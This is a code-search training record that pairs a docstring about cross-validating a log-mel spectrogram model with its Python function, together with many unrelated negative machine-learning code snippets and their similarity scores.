datetime.datetime(year=2016, month=7, day=1)\n date_4 = datetime.datetime(year=2016, month=10, day=1)\n date_5 = datetime.datetime(year=2017, month=1, day=1)\n\n summaries: List[FoldSummary] = []\n\n for train_start, train_end, test_start, test_end in [\n (date_1, date_2, date_2, date_3),\n # (date_1, date_3, date_3, date_4),\n # (date_1, date_4, date_4, date_5)\n ]:\n print('Calculating train and test datasets')\n train_df = df[(df['timestamp'] >= train_start) & (df['timestamp'] < train_end)]\n test_df = df[(df['timestamp'] >= test_start) & (df['timestamp'] < test_end)]\n\n columns = list(train_df.columns)\n columns.remove('timestamp')\n columns.remove('meter_reading')\n\n print(columns)\n\n train_data = train_df[columns]\n test_data = test_df[columns]\n\n print(f'Fitting the model on train dataset of size {len(train_data)}')\n model.fit(train_data, train_df['meter_reading'])\n print(f'Predicting for test dataset of size {len(test_data)}')\n predictions = model.predict(test_data)\n\n score = self._calculate_score(predictions, test_df['meter_reading'])\n print(f'Score: {score}')\n\n summaries.append(FoldSummary(\n train_start=train_start,\n train_end=train_end,\n test_start=test_start,\n test_end=test_end,\n score=score\n ))\n\n filename = f'../resources/runs/{time.time()}.txt'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as f:\n f.write(f'{model.__class__.__name__}\\n')\n f.write(f'{str(model.get_params())}\\n')\n for summary in summaries:\n f.write(f'Summary (\\n'\n f'\\ttrain start: {summary.train_start}\\n'\n f'\\ttrain end: {summary.train_end}\\n'\n f'\\ttest start: {summary.test_start}\\n'\n f'\\ttest end: {summary.test_end}\\n'\n f'\\tscore: {summary.score}\\n'\n f')\\n')\n\n print(summaries)\n\n return model", "def test(model_params, dataset_test, testing_params, log_directory, device, cuda_available=True,\n metric_fns=None):\n # DATA LOADER\n test_loader = DataLoader(dataset_test, batch_size=testing_params[\"batch_size\"],\n shuffle=False, pin_memory=True,\n collate_fn=imed_loader_utils.imed_collate,\n num_workers=0)\n\n # LOAD TRAIN MODEL\n fname_model = os.path.join(log_directory, \"best_model.pt\")\n print('\\nLoading model: {}'.format(fname_model))\n model = torch.load(fname_model, map_location=device)\n if cuda_available:\n model.cuda()\n model.eval()\n\n # CREATE OUTPUT FOLDER\n path_3Dpred = os.path.join(log_directory, 'pred_masks')\n if not os.path.isdir(path_3Dpred):\n os.makedirs(path_3Dpred)\n\n # METRIC MANAGER\n metric_mgr = imed_metrics.MetricManager(metric_fns)\n\n # UNCERTAINTY SETTINGS\n if (testing_params['uncertainty']['epistemic'] or testing_params['uncertainty']['aleatoric']) and \\\n testing_params['uncertainty']['n_it'] > 0:\n n_monteCarlo = testing_params['uncertainty']['n_it']\n testing_params['uncertainty']['applied'] = True\n print('\\nComputing model uncertainty over {} iterations.'.format(n_monteCarlo))\n else:\n testing_params['uncertainty']['applied'] = False\n n_monteCarlo = 1\n\n for i_monteCarlo in range(n_monteCarlo):\n preds_npy, gt_npy = run_inference(test_loader, model, model_params, testing_params, path_3Dpred,\n cuda_available, i_monteCarlo)\n metric_mgr(preds_npy, gt_npy)\n\n # COMPUTE UNCERTAINTY MAPS\n if n_monteCarlo > 1:\n imed_utils.run_uncertainty(ifolder=path_3Dpred)\n\n metrics_dict = metric_mgr.get_results()\n metric_mgr.reset()\n print(metrics_dict)\n return metrics_dict", "def __test_similarity(self):\n\n _, test_loader, _ = create_loaders()\n\n false_counter = 0\n for (image, labels) in test_loader:\n\n output_pytorch = self._model(image).detach().numpy()\n\n im = image.numpy().flatten()\n output_manual = self.run_through_model(im)\n\n if np.allclose(output_pytorch, output_manual, rtol=1e-4, atol=1e-4) is not True:\n false_counter += 1\n\n print(f\"Number of mistakes: {false_counter}\")", "def test_shap_contributions_1(self):\n for model in self.modellist:\n print(type(model))\n model.fit(self.x_df, self.y_df)\n if str(type(model)) in simple_tree_model:\n explainer = shap.TreeExplainer(model)\n\n elif str(type(model)) in catboost_model:\n explainer = shap.TreeExplainer(model)\n\n elif str(type(model)) in linear_model:\n explainer = shap.LinearExplainer(model, self.x_df)\n\n elif str(type(model)) in svm_model:\n explainer = shap.KernelExplainer(model.predict, self.x_df)\n\n shap_contributions(model, self.x_df, explainer)", "def main(config):\n input_data = config[\"input_data\"]\n\n # Separate OBS from model datasets\n # (and check there is only one obs dataset)\n obs = [v for v in input_data.values() if v[\"project\"] == \"OBS\"]\n if len(obs) != 1:\n msg = f\"Expected exactly 1 OBS dataset: found {len(obs)}\"\n raise RuntimeError(msg)\n clim_file = obs[0][\"filename\"]\n\n models = group_metadata(\n [v for v in input_data.values() if v[\"project\"] != \"OBS\"],\n \"dataset\")\n\n for model_dataset, group in models.items():\n # 'model_dataset' is the name of the model dataset.\n # 'group' is a list of dictionaries containing metadata.\n logger.info(\"Processing data for %s\", model_dataset)\n model_file = [item[\"filename\"] for item in group]\n\n # Input filenames for provenance\n ancestors = flatten([model_file, clim_file])\n\n # Calculate metrics\n metrics = land_sm_top(clim_file, model_file, model_dataset, config,\n ancestors)\n\n # Write metrics\n metrics_dir = os.path.join(\n config[\"plot_dir\"],\n f\"{config['exp_model']}_vs_{config['control_model']}\",\n config[\"area\"],\n model_dataset,\n )\n\n write_metrics(metrics_dir, metrics, config, ancestors)", "def run_test(models, data):\n num_correct = 0.0\n num_total = 0.0\n\n # initialize lists to put in predictions & results for confusion matrix \n predicted_labels = []\n actual_labels = []\n langlist = models.keys()\n for ai, actual_lang in enumerate(langlist):\n test_files = open(os.path.join('traintestsplit', actual_lang+'.testlist')).read().split()\n print 'Testing', len(test_files), 'files from', actual_lang\n for filename in test_files:\n logprobs = {} # dict: total log prob of this file under each model \n for test_lang in langlist:\n logprobs[test_lang] = apply_model(models[test_lang], data[actual_lang][filename+'.npytxt'])\n predicted_lang = max(logprobs.items(), key=lambda x:x[1])[0]\n # insert prediction (of lang index) into predicted list \n predicted_labels.append(langlist.index(predicted_lang))\n actual_labels.append(ai)\n if actual_lang == predicted_lang:\n num_correct += 1\n num_total += 1\n\n print len(filter(lambda x:x==ai, predicted_labels[-len(test_files):])), 'correct'\n\n print\n print 'Accuracy', num_correct*100/num_total\n\n #CONFUSION MATRIX (y_test, y_pred) -> (actual label, predictions) \n cm = confusion_matrix(actual_labels, predicted_labels)\n cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n # display confusion stats by lang (TODO: visualize with matplotlib) \n print '*'*20\n for ai, actual_lang in enumerate(langlist):\n print actual_lang, 'confusion:'\n for pi, predicted_lang in enumerate(langlist):\n print '{0}: {1:.2f}%'.format(predicted_lang, cm_normalized[ai, pi]*100)\n print '*'*20", "def runmodel(model, patient_index=-1, frequency=0.4, quiet=False, silent=False, normalized=False, filter_on=False,\n print_example_vector=False, save_reconstruction=False, adc_on=False, dwi_lvl=None):\n\n modelname = model.__class__.__name__\n\n # Gather the types of data to be used in the predictions\n\n if silent:\n quiet = True\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: making training data\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n\n masks = get_masks(data)\n\n if normalized:\n t2 = normalize_t2(data)\n else:\n t2 = get_t2(data)\n\n if patient_index == -1:\n patient_index = n_patients - 1\n\n image_set_total = [t2]\n\n if filter_on:\n t2_filtered = get_filtered_t2(data, frequency=frequency)\n image_set_total.append(t2_filtered)\n\n if adc_on:\n adc = get_adc(data)\n image_set_total.append(adc)\n\n if dwi_lvl is not None:\n dwi = get_dwi(data, weight=dwi_lvl)\n image_set_total.append(dwi)\n\n X_train = []\n y_train = []\n\n # Create training data\n\n for i in range(n_patients):\n\n if i == patient_index:\n continue\n\n else:\n\n if len(image_set_total) > 1:\n image_set = [imset[i] for imset in image_set_total]\n X_train_single, y_train_single = create_multiparametric_dataset(image_set, masks[i], n, prune=prune)\n else:\n X_train_single, y_train_single = create_dataset(t2[i], masks[i], n, prune=prune)\n\n X_train += X_train_single\n y_train += y_train_single\n\n if print_example_vector:\n ex_vec = X_train[0]\n print \"length of example vector:\", len(ex_vec)\n print ex_vec\n\n # Create testing data\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: making testing data\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n\n test_mask = masks[patient_index]\n test_t2 = t2[patient_index]\n\n if len(image_set_total) > 1:\n image_set = [imset[patient_index] for imset in image_set_total]\n X_test, y_test = create_multiparametric_dataset(image_set, test_mask, n, prune=prune, save_pxs=True)\n else:\n X_test, y_test = create_dataset(test_t2, test_mask, n, prune=prune, save_pxs=True)\n\n # Train, predict, and score\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: training using {n_pts} points\".format(model=modelname, n_patients=n_patients, patient=patient_index+1, n_pts=len(y_train))\n model.fit(X_train, y_train)\n\n if not quiet:\n print \"{model}: patient {patient}/{n_patients}: testing using {n_pts} points\".format(model=modelname, n_patients=n_patients, patient=patient_index+1, n_pts=len(y_test))\n y_pred = model.predict(X_test)\n\n score = roc_auc_score(y_true=y_test, y_score=y_pred)\n\n if not silent:\n print \"{model}: patient {patient}/{n_patients}: score {score}\".format(model=modelname, n_patients=n_patients, score=score, patient=patient_index+1)\n\n if save_reconstruction:\n if not silent:\n print \"{model}: patient {patient}/{n_patients}: saving reconstructed mask\".format(model=modelname, n_patients=n_patients, patient=patient_index+1)\n reconstruction = reconstruct(test_mask, y_pred, active_pixels[patient_index])\n else:\n reconstruction = None\n\n return score, reconstruction", "def on_train_begin(self, logs=None):", "def on_train_begin(self, logs=None):", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def test_forfatal_functions(self):\n logging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\n logging.getLogger(\"batchglm\").setLevel(logging.WARNING)\n logging.getLogger(\"diffxpy\").setLevel(logging.WARNING)\n\n num_observations = 10\n num_features = 2\n\n sim = Simulator(num_observations=num_observations, num_features=num_features)\n sim.generate_sample_description(num_batches=0, num_conditions=0)\n sim.generate()\n\n random_sample_description = pd.DataFrame({\n \"pseudotime\": np.random.random(size=sim.nobs),\n \"batch\": np.random.randint(2, size=sim.nobs)\n })\n\n test = de.test.continuous_1d(\n data=sim.X,\n continuous=\"pseudotime\",\n df=3,\n formula_loc=\"~ 1 + pseudotime + batch\",\n formula_scale=\"~ 1\",\n factor_loc_totest=\"pseudotime\",\n test=\"wald\",\n sample_description=random_sample_description,\n quick_scale=True,\n batch_size=None,\n training_strategy=\"DEFAULT\",\n dtype=\"float64\"\n )\n\n summary = test.summary()\n ids = test.gene_ids\n\n # 1. Test all additional functions which depend on model computation:\n # 1.1. Only continuous model:\n temp = test.log_fold_change(genes=ids, nonnumeric=False)\n temp = test.max(genes=ids, nonnumeric=False)\n temp = test.min(genes=ids, nonnumeric=False)\n temp = test.argmax(genes=ids, nonnumeric=False)\n temp = test.argmin(genes=ids, nonnumeric=False)\n temp = test.summary(nonnumeric=False)\n # 1.2. Full model:\n temp = test.log_fold_change(genes=ids, nonnumeric=True)\n temp = test.max(genes=ids, nonnumeric=True)\n temp = test.min(genes=ids, nonnumeric=True)\n temp = test.argmax(genes=ids, nonnumeric=True)\n temp = test.argmin(genes=ids, nonnumeric=True)\n temp = test.summary(nonnumeric=True)\n\n return True", "def test_char_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": { # default token_spans_pooling_type is \"first\"\n \"embedder_type\": \"glove\", \"emb_dim\": 30, \"tokenizer_type\": \"char-tokenizer\"},\n }\n examples = self.labeled_data.queries()\n labels = self.labeled_data.entities()\n\n with pytest.raises(ValueError):\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n\n config = {**config, \"params\": {\n \"embedder_type\": None, \"emb_dim\": 30, \"tokenizer_type\": \"char-tokenizer\"}\n }\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"add_terminals\": \"True\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def test_training(self):\n\t\tpass", "def main():\n\n args = define_and_process_args()\n print('\\n', 'ARGUMENTS', '\\n\\n', args, '\\n')\n\n log_dir = get_log_dir(args)\n print('\\n', 'LOG DIRECTORY', '\\n\\n', log_dir, '\\n')\n\n standardized_data_path = os.path.join(args.data_dir, args.data_filename)\n if not os.path.exists(standardized_data_path):\n message = '%s does not exist.' % standardized_data_path\n raise ValueError(message)\n\n dataset = data.Dataset(standardized_data_path)\n train_raw_seqs, test_raw_seqs = dataset.get_splits(args.test_users)\n train_triplets = [data.prepare_raw_seq(seq) for seq in train_raw_seqs]\n test_triplets = [data.prepare_raw_seq(seq) for seq in test_raw_seqs]\n\n train_input_seqs, train_reset_seqs, train_label_seqs = zip(*train_triplets)\n test_input_seqs, test_reset_seqs, test_label_seqs = zip(*test_triplets)\n\n Model = eval('models.' + args.model_type + 'Model')\n input_size = dataset.input_size\n target_size = dataset.num_classes\n\n # This is just to satisfy a low-CPU requirement on our cluster\n # when using GPUs.\n if 'CUDA_VISIBLE_DEVICES' in os.environ:\n config = tf.ConfigProto(intra_op_parallelism_threads=2,\n inter_op_parallelism_threads=2)\n else:\n config = None\n\n with tf.Session(config=config) as sess:\n model = Model(input_size, target_size, args.num_layers,\n args.hidden_layer_size, args.init_scale,\n args.dropout_keep_prob)\n optimizer = optimizers.Optimizer(\n model.loss, args.num_train_sweeps, args.initial_learning_rate,\n args.num_initial_sweeps, args.num_sweeps_per_decay,\n args.decay_factor, args.max_global_grad_norm)\n train(sess, model, optimizer, log_dir, args.batch_size,\n args.num_sweeps_per_summary, args.num_sweeps_per_save,\n train_input_seqs, train_reset_seqs, train_label_seqs,\n test_input_seqs, test_reset_seqs, test_label_seqs)", "def test():\n # load dataset and model\n X, observed_y = load_data('../data/dev.txt')\n\n model = pickle.load(open('test.model', 'rb'))\n model.traverse()\n\n # predict labels for dataset\n preds = model.predict(X)\n\n # print(preds)\n # output model predictions\n np.savetxt('test.predictions', preds, fmt='%s')", "def run(self):\n print('Running test of the markups in different views')\n\n #\n # first load the data\n #\n import SampleData\n sampleDataLogic = SampleData.SampleDataLogic()\n print(\"Getting MR Head Volume\")\n mrHeadVolume = sampleDataLogic.downloadMRHead()\n\n #\n # link the viewers\n #\n sliceLogic = slicer.app.layoutManager().sliceWidget('Red').sliceLogic()\n compositeNode = sliceLogic.GetSliceCompositeNode()\n compositeNode.SetLinkedControl(1)\n\n #\n # MR Head in the background\n #\n sliceLogic.StartSliceCompositeNodeInteraction(1)\n compositeNode.SetBackgroundVolumeID(mrHeadVolume.GetID())\n sliceLogic.EndSliceCompositeNodeInteraction()\n\n #\n # switch to conventional layout\n #\n lm = slicer.app.layoutManager()\n lm.setLayout(2)\n\n # create a fiducial list\n displayNode = slicer.vtkMRMLMarkupsDisplayNode()\n slicer.mrmlScene.AddNode(displayNode)\n fidNode = slicer.vtkMRMLMarkupsFiducialNode()\n slicer.mrmlScene.AddNode(fidNode)\n fidNode.SetAndObserveDisplayNodeID(displayNode.GetID())\n\n # make it active\n selectionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSelectionNodeSingleton\")\n if (selectionNode is not None):\n selectionNode.SetReferenceActivePlaceNodeID(fidNode.GetID())\n\n # add some known points to it\n eye1 = [33.4975, 79.4042, -10.2143]\n eye2 = [-31.283, 80.9652, -16.2143]\n nose = [4.61944, 114.526, -33.2143]\n index = fidNode.AddFiducialFromArray(eye1)\n fidNode.SetNthFiducialLabel(index, \"eye-1\")\n index = fidNode.AddFiducialFromArray(eye2)\n fidNode.SetNthFiducialLabel(index, \"eye-2\")\n # hide the second eye as a test of visibility flags\n fidNode.SetNthFiducialVisibility(index, 0)\n index = fidNode.AddFiducialFromArray(nose)\n fidNode.SetNthFiducialLabel(index, \"nose\")\n\n self.logicDelayDisplay(\"Placed 3 fiducials\")\n\n # self.printViewAndSliceNodes()\n\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # switch to 2 3D views layout\n #\n lm.setLayout(15)\n self.logicDelayDisplay(\"Switched to 2 3D views\")\n # self.printViewAndSliceNodes()\n\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0 or self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1 and 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # show only in view 2\n #\n displayNode.AddViewNodeID(\"vtkMRMLViewNode2\")\n self.logicDelayDisplay(\"Showing only in view 2\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 1:\n self.logicDelayDisplay(\"Test failed: widget is not supposed to be visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n #\n # remove it so show in all\n #\n displayNode.RemoveAllViewNodeIDs()\n self.logicDelayDisplay(\"Showing in both views\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0 or self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1 and 2\")\n self.printViewNodeIDs(displayNode)\n return False\n\n #\n # show only in view 1\n #\n displayNode.AddViewNodeID(\"vtkMRMLViewNode1\")\n self.logicDelayDisplay(\"Showing only in view 1\")\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode2') == 1:\n self.logicDelayDisplay(\"Test failed: widget is not supposed to be visible in view 2\")\n # self.printViewNodeIDs(displayNode)\n return False\n if self.widgetVisible(fidNode, 'vtkMRMLViewNode1') == 0:\n self.logicDelayDisplay(\"Test failed: widget is not visible in view 1\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n # switch back to conventional\n lm.setLayout(2)\n self.logicDelayDisplay(\"Switched back to conventional layout\")\n # self.printViewAndSliceNodes()\n\n # test of the visibility in slice views\n displayNode.RemoveAllViewNodeIDs()\n\n # jump to the last fiducial\n slicer.modules.markups.logic().JumpSlicesToNthPointInMarkup(fidNode.GetID(), index, 1)\n # refocus the 3D cameras as well\n slicer.modules.markups.logic().FocusCamerasOnNthPointInMarkup(fidNode.GetID(), index)\n\n # show only in red\n displayNode.AddViewNodeID('vtkMRMLSliceNodeRed')\n self.logicDelayDisplay(\"Show only in red slice\")\n if self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed') != 1:\n self.logicDelayDisplay(\"Test failed: widget not displayed on red slice\")\n # self.printViewNodeIDs(displayNode)\n return False\n\n # remove all, add green\n # print 'before remove all, after added red'\n # self.printViewNodeIDs(displayNode)\n displayNode.RemoveAllViewNodeIDs()\n # print 'after removed all'\n # self.printViewNodeIDs(displayNode)\n displayNode.AddViewNodeID('vtkMRMLSliceNodeGreen')\n self.logicDelayDisplay('Show only in green slice')\n if self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed') != 0 or self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeGreen') != 1:\n self.logicDelayDisplay(\"Test failed: widget not displayed only on green slice\")\n print '\\tred = ',self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeRed')\n print '\\tgreen =',self.widgetVisibleOnSlice(fidNode,'vtkMRMLSliceNodeGreen')\n self.printViewNodeIDs(displayNode)\n return False\n\n return True", "def test_glove_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": {\"embedder_type\": \"glove\"},\n }\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n examples = self.labeled_data.queries()\n labels = self.labeled_data.entities()\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def test_stage_0():\n\tra_1 = readImage(TRAIN_RAW_IMAGE_1)\n\tre_1 = readImage(TRAIN_RESULT_IMAGE_1)\n\n\tra_2 = readImage(TRAIN_RAW_IMAGE_2)\n\tre_2 = readImage(TRAIN_RESULT_IMAGE_2)\n\n\t# Uncomment below if more examples are required.\n\t# ra_3 = readImage(TRAIN_RAW_IMAGE_3)\n\t# re_3 = readImage(TRAIN_RESULT_IMAGE_3)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_1 += (\n\t# \tlaplace_operator(TRAIN_RAW_IMAGE_1),\\\n\t# \t# k_means(TRAIN_RAW_IMAGE_1)[0],\\\n\t# \t)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_2 += (\n\t# \tlaplace_operator(TRAIN_RAW_IMAGE_2),\\\n\t# \t# k_means(TRAIN_RAW_IMAGE_2)[0],\\\n\t# \t)\n\n\t# The prediction model is obtained and trained.\n\tengine = get_model((ra_1, ra_2,), (re_1, re_2,), model_type=SVM, percentage=0.1)\n\n\ttest_percentage = float(1) # how many tests\n\n\tra_1 = readImage(TEST_RAW_IMAGE_1)\n\n\t# Uncomment below if the additional features are needed.\n\t# ra_1 += (\n\t# \tlaplace_operator(TEST_RAW_IMAGE_1),\\\n\t# \t# k_means(TEST_RAW_IMAGE_1)[0],\\\n\t# \t)\n\n\tre_1 = readImage(TEST_RESULT_IMAGE_1)\n\n\t# ra_2 = readImage(TEST_RAW_IMAGE_2)\n\t# re_2 = readImage(TEST_RESULT_IMAGE_2)\n\n\tinput_vec = []\n\t# The features are extracted.\n\tinput_vec += buildFeatureArray_2(ra_1[0], ra_1[1], ra_1[2],\\\n\t\tRADIUS_ARRAY,\\\n\t\tadditional_feats=([] if len(ra_1) == 3 else ra_1[3:]))\n\n\tex_no = int(test_percentage * len(input_vec)) # actual number of the test sample\n\n\toutput_vec = []\n\toutput_vec += matrixToArray(re_1[0], lambda el: 1 if el == 255 else 0)\n\n\tprint('Will start predicting...')\n\n\tpredicted_vec = engine.predict(input_vec[:ex_no])\n\n\tcounter = float(0)\n\tfor y, p in zip(output_vec[:ex_no], predicted_vec[:ex_no]):\n\t\tif y == p: counter += 1\n\n\tprint('Accuracy: ' + str(counter/ex_no))\n\n\tpredicted_mat = arrayToMatrix( predicted_vec, len(re_1[0]), len(re_1[0][0]),\\\n\t\tlambda el: 255 if el == 1 else 0)\n\n\t# The predicted segmentation is saved.\n\tsave_rgb_img(\\\n\t np.array(predicted_mat).transpose(),\\\n\t np.array(predicted_mat).transpose(),\\\n\t np.array(predicted_mat).transpose(),\\\n\t 'pred.bmp',\\\n\t)", "def test_predictor():", "def evaluate(model, tokenizer, dataset, lines, output_test_file, batch_size=32):\n sampler = SequentialSampler(dataset)\n dataloader = DataLoader(dataset, sampler=eval_sampler, batch_size=batch_size)\n\n print(\"*** Evaluating ***\")\n eval_loss = 0.0\n num_steps = 0\n preds = None\n out_label_ids = None\n for i, batch in enumerate(dataloader):\n if i % 200 == 199:\n print(\"=\", end=\"\")\n if i % 5000 == 4999:\n print(\"[Step \" + str(i+1) + \" / \" + str(len(dataloader)) + \"] \" )\n model.eval()\n batch = tuple(t.to(device) for t in batch)\n\n with torch.no_grad():\n labels = batch[3]\n outputs = model(input_ids=batch[0], attention_mask=batch[1], labels=labels)\n tmp_eval_loss, logits = outputs[:2]\n eval_loss += tmp_eval_loss.mean().item()\n \n num_steps += 1\n if preds is None:\n preds = logits.detach().cpu().numpy()\n out_label_ids = labels.detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, labels.detach().cpu().numpy(), axis=0)\n \n eval_loss = eval_loss / num_steps\n \n preds_label = np.argmax(preds, axis=1)\n \n accuracy = (preds_label == out_label_ids).mean()\n output_dir = os.path.dirname(output_test_file)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n with open(output_test_file, \"w\") as writer:\n all_logits = preds.tolist()\n for i, logit in enumerate(all_logits):\n line = '<CODESPLIT>'.join(\n [item.encode('ascii', 'ignore').decode('ascii') for item in lines[i]])\n\n writer.write(line + '<CODESPLIT>' + '<CODESPLIT>'.join([str(l) for l in logit]) + '\\n')\n print(\"Accuracy =\", str(accuracy))\n\n return accuracy" ]
[ "0.6325506", "0.6192102", "0.6124805", "0.60204524", "0.6009529", "0.5962141", "0.59607697", "0.59232557", "0.589596", "0.58899426", "0.58750546", "0.58347756", "0.5821097", "0.58149606", "0.5804652", "0.578651", "0.5777658", "0.57776195", "0.5773679", "0.5771149", "0.575928", "0.5745834", "0.57231796", "0.5720955", "0.5717427", "0.57144886", "0.5704706", "0.5701107", "0.56872004", "0.5677923", "0.56743366", "0.56485844", "0.5645845", "0.56344795", "0.5631731", "0.5630153", "0.56158537", "0.56141806", "0.5613516", "0.56131476", "0.5608466", "0.56011236", "0.55944824", "0.5592963", "0.55831075", "0.55828846", "0.5581233", "0.5580394", "0.556971", "0.55694324", "0.55687445", "0.55644363", "0.5561171", "0.55593586", "0.5556008", "0.5549844", "0.5542836", "0.5541267", "0.55329853", "0.5523869", "0.55151665", "0.5514203", "0.55114836", "0.5510725", "0.5508459", "0.5506405", "0.550558", "0.55040646", "0.55023104", "0.54980725", "0.5496414", "0.54847664", "0.54812825", "0.54718995", "0.5470682", "0.54703057", "0.5469593", "0.5468336", "0.54670376", "0.546448", "0.5462629", "0.545995", "0.54524875", "0.54522693", "0.54519683", "0.54507744", "0.5446045", "0.54368395", "0.5432702", "0.5432702", "0.5430789", "0.5430311", "0.54246503", "0.5419038", "0.54135334", "0.5407588", "0.5405331", "0.53971267", "0.53968245", "0.53873646", "0.53741443" ]
0.0
-1
Performs cross validation on a segmented logmel spectrogram trained model.
def cv(preds_path_stem, num_ensemble=1): fold_accs = [] fold_c_matricies = [] for fold in range(1, 6): data_val = load_dataset( f'Data/esc50_mel_wind_tfr/raw/fold_{fold}.tfrecords') pred_paths=[f'{preds_path_stem}preds_fold_{i}_{fold}.npy' for i in range(1, num_ensemble+1)] fold_acc, fold_c_matrix = test_wind_mel_model(pred_paths, data_val) fold_accs.append(fold_acc) fold_c_matricies.append(fold_c_matrix) cv_acc = np.mean(fold_accs) cv_acc_std = np.std(fold_accs) c_matrix = np.sum(fold_c_matricies, axis=0) / np.sum(fold_c_matricies) np.save(f'{preds_path_stem}cmatrix_{num_ensemble}.npy', c_matrix) print(f"The cross validation accuracy is {cv_acc:.4f} " f"+/- 1.96 * {cv_acc_std:.4f}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self, df: pd.DataFrame, model: Any):\n print(f'Running cross validation with the following model:\\n{model}')\n\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n\n date_1 = datetime.datetime(year=2016, month=1, day=1)\n date_2 = datetime.datetime(year=2016, month=4, day=1)\n date_3 = datetime.datetime(year=2016, month=7, day=1)\n date_4 = datetime.datetime(year=2016, month=10, day=1)\n date_5 = datetime.datetime(year=2017, month=1, day=1)\n\n summaries: List[FoldSummary] = []\n\n for train_start, train_end, test_start, test_end in [\n (date_1, date_2, date_2, date_3),\n # (date_1, date_3, date_3, date_4),\n # (date_1, date_4, date_4, date_5)\n ]:\n print('Calculating train and test datasets')\n train_df = df[(df['timestamp'] >= train_start) & (df['timestamp'] < train_end)]\n test_df = df[(df['timestamp'] >= test_start) & (df['timestamp'] < test_end)]\n\n columns = list(train_df.columns)\n columns.remove('timestamp')\n columns.remove('meter_reading')\n\n print(columns)\n\n train_data = 